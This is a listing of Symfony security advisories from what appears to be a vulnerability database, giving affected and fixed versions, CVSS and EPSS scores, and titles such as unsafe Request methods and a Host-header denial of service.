Affected versions: All 2.0.X, 2.1.X, 2.2.X, 2.3.X, 2.4.X, 2.5.X, and 2.6.X versions of the Symfony HttpKernel component are affected by this security issue. This issue has been fixed in Symfony 2.3.27, 2.5.11, and 2.6.6. Note that no fixes are provided for Symfony 2.0, 2.1, 2.2, and 2.4 as they ar...

CVSS 6.8 | AI score 6.2 | EPSS 0.01365 | Exploits 0

Symfony, added 2015/04/01

CVE-2015-2309: Unsafe methods in the Request class

Affected versions: All 2.0.X, 2.1.X, 2.2.X, 2.3.X, 2.4.X, 2.5.X, and 2.6.X versions of the Symfony HttpFoundation component are affected by this security issue. This issue has been fixed in Symfony 2.3.27, 2.5.11, and 2.6.6. Note that no fixes are provided for Symfony 2.0, 2.1, 2.2, and 2.4 as the...

AI score 6 | EPSS 0.00785 | Exploits 0

Symfony, added 2014/09/03

CVE-2014-5244: Denial of service with a malicious HTTP Host header

Affected versions: All 2.0.X, 2.1.X, 2.2.X, 2.3.X, 2.4.X, and 2.5.X versions of the Symfony HttpFoundation component are affected by this security issue. This issue has been fixed in Symfony 2.3.19, 2.4.9, and 2.5.4. Note that no fixes are provided for Symfony 2.0, 2.1, and 2.2 as they are not...

AI score 6 | EPSS 0.01663 | Exploits 0

Total number of security vulnerabilities: 76